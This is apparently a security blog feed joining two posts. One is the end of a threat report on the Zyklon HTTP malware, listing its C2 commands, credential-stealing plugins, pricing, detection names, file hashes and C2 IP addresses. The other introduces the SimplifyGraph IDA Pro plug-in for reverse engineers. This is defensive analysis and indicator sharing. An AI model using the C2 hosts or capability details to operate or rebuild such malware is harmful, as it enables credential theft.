Command

Action

sign

Requests system information

settings

Requests settings from C2 server

logs

Uploads harvested passwords

wallet

Uploads harvested cryptocurrency wallet data

proxy

Indicates SOCKS proxy port opened

miner

Cryptocurrency miner commands

error

Reports errors to C2 server

ddos

DDoS attack commands

Table 1: Zyklon accepted commands

The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.


Figure 13: Zyklon issuing “settings” command and subsequent server response


Figure 14: Zyklon issuing “sign” command and subsequent server response


Figure 15: Zyklon issuing “ddos” command and subsequent server response

Plugin Manager

Zyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:

  • /plugin/index.php?plugin=<Plugin_Name>

The following plugins are found in the memory of the Zyklon malware:

  • /plugin/index.php?plugin=cuda
  • /plugin/index.php?plugin=minerd
  • /plugin/index.php?plugin=sgminer
  • /plugin/index.php?plugin=socks
  • /plugin/index.php?plugin=tor
  • /plugin/index.php?plugin=games
  • /plugin/index.php?plugin=software
  • /plugin/index.php?plugin=ftp
  • /plugin/index.php?plugin=email
  • /plugin/index.php?plugin=browser

The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.

Additional Features

The Zyklon malware offers the following additional capabilities (via plugins):

Browser Password Recovery

Zyklon HTTP can recover passwords from popular web browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera Browser
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Apple Safari
  • Flock Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Comodo Dragon Browser
FTP Password Recovery

Zyklon currently supports FTP password recovery from the following FTP applications:

  • FileZilla
  • SmartFTP
  • FlashFXP
  • FTPCommander
  • Dreamweaver
  • WS_FTP
Gaming Software Key Recovery

Zyklon can recover PC Gaming software keys from the following games:

  • Battlefield
  • Call of Duty
  • FIFA
  • NFS
  • Age of Empires
  • Quake
  • The Sims
  • Half-Life
  • IGI
  • Star Wars
Email Password Recovery

Zyklon may also collect email passwords from following applications:

  • Microsoft Outlook Express
  • Microsoft Outlook 2002/XP/2003/2007/2010/2013
  • Mozilla Thunderbird
  • Windows Live Mail 2012
  • IncrediMail, Foxmail v6.x - v7.x
  • Windows Live Messenger
  • MSN Messenger
  • Google Talk
  • GMail Notifier
  • PaltalkScene IM
  • Pidgin (Formerly Gaim) Messenger
  • Miranda Messenger
  • Windows Credential Manager
License Key Recovery

The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

Socks5 Proxy

Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

Hijack Clipboard Bitcoin Address

Zyklon has the ability to hijack the clipboard, and replaces the user’s copied bitcoin address with an address served up by the actor’s control server.

Zyklon Pricing

Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

  • Normal build: $75 (USD)
  • Tor-enabled build: $125 (USD)
  • Rebuild/Updates: $15 (USD)
  • Payment Method: Bitcoin (BTC)

Conclusion

Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

Detection Name

Product

Action

POWERSHELL DOWNLOADER D (METHODOLOGY)

HX

Detect

SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

HX

Detect

POWERSHELL DOWNLOADER (METHODOLOGY)

HX

Detect

SUSPICIOUS EQNEDT USAGE (METHODOLOGY)

HX

Detect

TOR (TUNNELER)

HX

Detect

SUSPICIOUS SVCHOST.EXE (METHODOLOGY)

HX

Detect

Malware.Binary.rtf

EX/ETP/NX

Block

Malware.Binary

EX/ETP/NX

Block

FE_Exploit_RTF_CVE_2017_8759

EX/ETP/NX

Block

FE_Exploit_RTF_CVE201711882_1

EX/ETP/NX

Block

Table 2: Current detection capabilities by FireEye products

Indicators of Compromise

The contained analysis is based on the representative sample lures shown in Table 3.

MD5

Name

76011037410d031aa41e5d381909f9ce

accounts.doc

4bae7fb819761a7ac8326baf8d8eb6ab

Courrier.doc

eb5fa454ab42c8aec443ba8b8c97339b

doc.doc

886a4da306e019aa0ad3a03524b02a1c

Pause.ps1

04077ecbdc412d6d87fc21e4b3a4d088

words.exe

Table 3: Sample Zyklon lures

Network Indicators
  • 154.16.93.182
  • 85.214.136.179
  • 178.254.21.218
  • 159.203.42.107
  • 217.12.223.216
  • 138.201.143.186
  • 216.244.85.211
  • 51.15.78.0
  • 213.251.226.175
  • 93.95.100.202
  • warnono.punkdns.top

FLARE IDA Pro Script Series: Simplifying Graphs in IDA

By: Jay Smith
11 January 2018 at 16:45

Introduction

We’re proud to release a new plug-in for IDA Pro users – SimplifyGraph – to help automate creation of groups of nodes in the IDA’s disassembly graph view. Code and binaries are available from the FireEye GitHub repo. Prior to this release we submitted it in the 2017 Hex-Rays plugin contest, where it placed third overall.

My personal preference is to use IDA’s graph mode when doing the majority of my reverse engineering. It provides a graphical representation of the control flow graph and gives visual cues about the structure of the current function that helps me better understand the disassembly.

Graph mode is great until the function becomes complex. IDA is often forced to place adjacent nodes relatively far apart, or have edges in the graph cross and have complex paths. Using the overview graph becomes extremely difficult due to the density of nodes and edges, as seen in Figure 1.


Figure 1: An annoying function

IDA has a built-in mechanism to help simplify graphs: creating groups of nodes, which replaces all of the selected nodes with a new group node representative. This is done by selecting one or more nodes, right-clicking, and selecting “Group nodes”, as shown in Figure 2. Doing this manually is certainly possible, but it becomes tedious to follow edges in complex graphs and correctly select all of the relevant nodes without missing any, and without making mistakes.


Figure 2: Manual group creation

The SimplifyGraph IDA Pro plug-in we’re releasing is built to automate IDA’s node grouping capability. The plug-in is source-compatible with the legacy IDA SDK in 6.95, and has been ported to the new SDK for IDA 7.0. Pre-built binaries for both are available on the Releases tab for the project repository.

The plug-in has several parts, which are introduced below. By combining these together it’s possible to isolate parts of a control flow graph for in-depth reverse engineering, allowing you to look at Figure 3 instead of Figure 1.


Figure 3: Isolated subgraph to focus on

Create Unique-Reachable (UR) Subgraph

Unique-Reachable nodes are all nodes reachable in the graph from a given start node and that are not reachable from any nodes not currently in the UR set. For example, in Figure 4, all of the Unique-Reachable nodes starting at the green node are highlighted in blue. The grey node is reachable from the green node, but because it is reachable from other nodes not in the current UR set it is pruned prior to group creation.


Figure 4: Example Unique Reachable selection

The plug-in allows you to easily create a new group based on the UR definition. Select a node in IDA's graph view to be the start of the reachable search. Right click and select "SimplifyGraph -> Create unique-reachable group". The plug-in performs a graph traversal starting at this node, identifies all reachable nodes, and prunes any nodes (and their reachable nodes) that have predecessor nodes not in the current set. It then prompts you for the node text to appear in the new group node.

If you select more than one node (by holding the Ctrl key when selecting nodes) for the UR algorithm, each additional node acts as a sentry node. Sentry nodes will not be included in the new group, and they halt the graph traversal when searching for reachable nodes. For example, in Figure 5, selecting the green node first treats it as the starting node, and selecting the red node second treats it as a sentry node. Running the “Create unique-reachable group” plug-in option creates a new group made of the green node and all blue nodes. This can be useful when you are done analyzing a subset of the current graph, and wish to hide the details behind a group node so you can concentrate on the rest of the graph.


Figure 5: Unique reachable with sentry

The UR algorithm operates on the currently visible graph, meaning that you can run the UR algorithm repeatedly and nest groups.

Switch Case Groups Creation

Switch statements implemented as jump tables appear in the graph as nodes with a large fan-out, as shown in Figure 6. The SimplifyGraph plug-in detects when the currently selected node has more than two successor nodes and adds a right-click menu option “SimplifyGraph -> Create switch case subgraphs”. Selecting this runs the Unique-Reachable algorithm on each separate case branch and automatically uses IDA’s branch label as the group node text.


Figure 6: Switch jumptable use

Figure 7 shows a before and after graph overview of the same function when the switch-case grouping is run.


Figure 7: Before and after of switch statement groupings

Isolated Subgraphs

Running Edit -> Plugins -> SimplifyGraph brings up a new chooser named "SimplifyGraph - Isolated subgraphs" that begins showing what I call isolated subgraphs of the current graph, as seen in Figure 8.


Figure 8: Example isolated subgraphs chooser

A full definition appears later in the appendix including how these are calculated, but the gist is that an isolated subgraph in a directed graph is a subset of nodes and edges such that there is a single entrance node, a single exit node, and none of the nodes (other than the subgraph entry node) is reachable by nodes not in the subgraph.

Finding isolated subgraphs was originally researched to help automatically identify inline functions. It does this, but it turns out that this graph construct occurs naturally in code without inline functions. This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier.

Once the chooser is active, you can double click (or press Enter) on a row in the chooser to highlight the nodes that make up the subgraph, as seen in Figure 9.


Figure 9: Highlighted isolated subgraph

You can create a group for an isolated subgraph by:

  • Right-clicking on the chooser row and selecting "Create group", or pressing Insert while a row is selected.
  • Right-clicking in a highlighted isolated subgraph node and selecting "SimplifyGraph -> Create isolated subgraph".

Doing either of these prompts you for text for the new graph node to create.

If you manually create/delete groups using IDA you may need to refresh the chooser's knowledge of the current function groups (right-click and select "Refresh groups" in the chooser). You can right click in the chooser and select "Clear highlights" to remove the current highlights. As you navigate to new functions the chooser updates to show isolated subgraphs in the current function. Closing the chooser removes any active highlights. Any custom colors you applied prior to running the plug-in are preserved and reapplied when the current highlights are removed.

Isolated subgraph calculations operates on the original control flow graph, so isolated subgroups can't be nested. As you create groups, rows in the chooser turn red indicating a group already exists, or can't be created because there is an overlap with an existing group.

Another note: this calculation does not currently work on functions that do not return (those with an infinite loop). See the Appendix for details.

Graph Complement

Creating groups to simplify the overall control flow graph is nice, but it doesn’t help understand the details of a group that you create. To assist with this, the last feature of the plug-in hides everything but the group you’re interested in allowing you to focus on your reverse engineering. Right clicking on a collapsed group node, or a node that that belongs to an uncollapsed group (as highlighted by IDA in yellow), brings up the plug-in option “Complement & expand group” and “Complement group”, respectively. When this runs the plug-in creates a group of all nodes other than the group you’re interested in. This has the effect of hiding all graph nodes that you aren’t currently examining and allows you to better focus on analysis of the current group. As you can see, we’re abusing group creation a bit so that we can avoid creating a custom graph viewer, and instead stay within the built-in IDA graph disassembly view which allows us to continue to markup the disassembly as you’re used to.

Complementing the graph gives you the view seen in Figure 10, where the entire graph is grouped into a node named “Complement of group X”. When you’re done analyzing the current group, right click on the complement node and select IDA’s “Ungroup nodes” command.


Figure 10: Group complement

Example Workflow

As an example that exercises the plug-in, let’s revisit the function in Figure 1. This is a large command-and-control dispatch function for a piece of malware. It contains a large if-else-if series of inlined strcmp comparisons that branch to the logic for each command when the input string matches the expected command.

  1. Find all of the inline strcmp’s and create groups for those. Run Edit -> Plugins -> SimplifyGraph to bring up the plug-in chooser. In this function nearly every isolated subgraph is a 7-node inlined strcmp implementation. Go through in the chooser to verify, and create a group. This results in a graph similar to Figure 11.


    Figure 11: Grouped strcmp

  2. When an input string matches a command string, the malware branches to code that implements the command. To further simplify the graph and make analysis easier, run the Unique-Reachable algorithm on each separate command by right clicking on the first node after each string-comparison and selecting SimplifyGraph -> Create unique-reachable group. After this we now have a graph as in Figure 12.


    Figure 12: Grouped command logic

  3. Now perform your reverse engineering on each separate branch in the dispatch function. For each command handler group node that we created, right click that node and select “SimplifyGraph -> Complement & expand group”. A result of complementing a single command handler node is shown in Figure 13, which is much easier to analyze.


    Figure 13: Group complement

  4. When done analyzing the current command handler, delete the complement group by right clicking the “Complement of group X” node and use IDA’s built-in “Ungroup nodes” command. Repeat for the remaining command handler grouped nodes.

Config

You can tweak some of the configuration by entering data in a file named %IDAUSR%/SimplifyGraph.cfg, where %IDAUSR% is typically %APPDATA%/Hex-Rays/IDA Pro/ unless explicitly set to something else. All of the config applies to the isolated subgraph component. Options:

* SUBGRAPH_HIGHLIGHT_COLOR: Default 0xb3ffb3: The color to apply to nodes when you double click/press enter in the chooser to show nodes that make up the currently selected isolated subgraph. Not everyone agrees that my IDA color scheme is best, so you can set your own highlight color here.

* MINIMUM_SUBGRAPH_NODE_COUNT: Default 3: The minimum number of nodes for a valid isolated subgraph. If a discovered subgraph has fewer nodes than this number it is not included in the shown list. This prevents trivial two-node subgraphs from being shown.

* MAXIMUM_SUBGRAPH_NODE_PERCENTAGE: Default 95: The maximum percent of group nodes (100.0 *(subgroup_node_count / total_function_node_count)) allowed. This filters out isolated subgraphs that make up (nearly) the entire function, which are typically not interesting.

Example SimplifyGraph.cfg contents

```

"MINIMUM_SUBGRAPH_NODE_COUNT"=5

"MAXIMUM_SUBGRAPH_NODE_PERCENTAGE"=75

"SUBGRAPH_HIGHLIGHT_COLOR"=0x00aa1111

```

Prior work:

I came across semi-related work while working on this: GraphSlick from the 2014 Hex-Rays contest. That plug-in had different goals to automatically identifying (nearly) identical inline functions via CFG and basic block analysis, and patching the program to force mock function calls to the explicit function. It had a separate viewer to present information to the user.

SimplifyGraph is focused on automating tasks when doing manual reverse engineering (group creation) to reduce the complexity of disassembly in graph mode. Future work may incorporate the same prime-products calculations to help automatically identify isolated subgraphs.

Installation

Prebuilt Windows binaries are available from the Releases tab of the GitHub project page. The ZIP files contain both IDA 32 and IDA 64 plug-ins for each of the new IDA 7.0 SDK and for the legacy IDA 6.95 SDK. Copy the two plug-ins for your version of IDA to the %IDADIR%\plugins directory.

Building

This plug-in & related files were built using Visual Studio 2013 Update 5.

Environment Variables Referenced by project:

* IDASDK695: path to the extracted IDA 6.95 SDK. This should have `include` and `lib` paths beneath it.

* IDASDK: path to the extracted IDA 7.0 (or newer) SDK. This Should have `include` and `lib` paths beneath it.

* BOOSTDIR: path to the extracted Boost library. Should have `boost` and `libs` paths beneath it.

The easiest way is to use the Microsoft command-line build tools:

* For IDA7.0: Launch VS2013 x64 Native Tools Command Prompt, then run:

```

msbuild SimplifyGraph.sln /property:Configuration=ReleaseIDA70_32 /property:Platform=x64

msbuild SimplifyGraph.sln /property:Configuration=ReleaseIDA70_64 /property:Platform=x64

```

* For IDA6.95: Launch VS2013 x86 Native Tools Command Prompt, then run:

```

msbuild SimplifyGraph.sln /property:Configuration=ReleaseIDA695_32 /property:Platform=Win32

msbuild SimplifyGraph.sln /property:Configuration=ReleaseIDA695_64 /property:Platform=Win32

```

Conclusion

I hope this blog has shown the power of automatically grouping nodes within a disassembly graph view, and viewing these groups in isolation to help with your analysis. This plug-in has become a staple of my workflow, and we’re releasing it to the community with the hope that others find it useful as well.

Appendix: Isolated Subgraphs

Finding isolated subgraphs relies on calculating the immediate dominator and immediate post-dominator trees for a given function graph.

A node d dominates n if every path to n must go through d.

The immediate dominator p of node n is basically the closest dominator to n, where there is no node t where p dominates t, and t dominates n.

A node z post-dominates a node n if every path from n to the exit node must go through z.

The immediate post-dominator x of node n is the closest post-dominator, where there is no node t where t post-dominates n and x post-dominates t.

The immediate dominator relationship forms a tree of nodes, where every node has an immediate dominator other than the entry node.

The Lengauer-Tarjan algorithm can efficiently calculate the immediate dominator tree of a graph. It can also calculate the immediate post-dominator tree by reversing the direction of each edge in the same graph.

The plug-in calculates the immediate dominator tree and immediate post-dominator tree of the function control flow graph and looks for the situations where the (idom[i] == j) and (ipdom[j] == i). This means all paths from the function start to node i must go through node j, and all paths from j to the function terminal must go through i. A candidate isolated subgraph thus starts at node j and ends at node i.

For each candidate isolated subgraph, the plug-in further verifies only the entry node has predecessor nodes not in the candidate subgraph. The plug-in also filters out candidate subgraphs by making sure they have a minimum node count and cover a maximum percentage of nodes (see MINIMUM_SUBGRAPH_NODE_COUNT and MAXIMUM_SUBGRAPH_NODE_PERCENTAGE in the config section).

One complication is that functions often have more than one terminal node – programmers can arbitrarily return from the current function at any point. The immediate post-dominator tree is calculated for every terminal node, and any inconsistencies are marked as indeterminate and are not possible candidates for use. Functions with infinite loops do not have terminal nodes, and are not currently handled.

For a simple example, consider the graph in Figure 14. It has the following immediate dominator and post-dominator trees:


Figure 14: Example graph

Node

idom

0

None

1

0

2

1

3

1

4

3

5

3

6

3

7

6

8

0

Node

ipdom

0

8

1

3

2

3

3

6

4

6

5

6

6

7

7

8

8

None

Looking for pairs of (idom[i] == j) and (ipdom[j] == i) gives the following:

(0, 8) (1, 3) (3, 6) (6,7)

(0, 8) is filtered because it makes up all of the nodes of the graph.

(1,3) and (6, 7) are filtered out because they contain nodes reachable from nodes not in the set: for (1, 3) node 2 is reachable from node 6, and for (6, 7) node 2 is reachable from node 1.

This leaves (3, 6) as the only isolate subgraph in this example, shown in Figure 15.


Figure 15: Example graph with isolated subgraph

❌
❌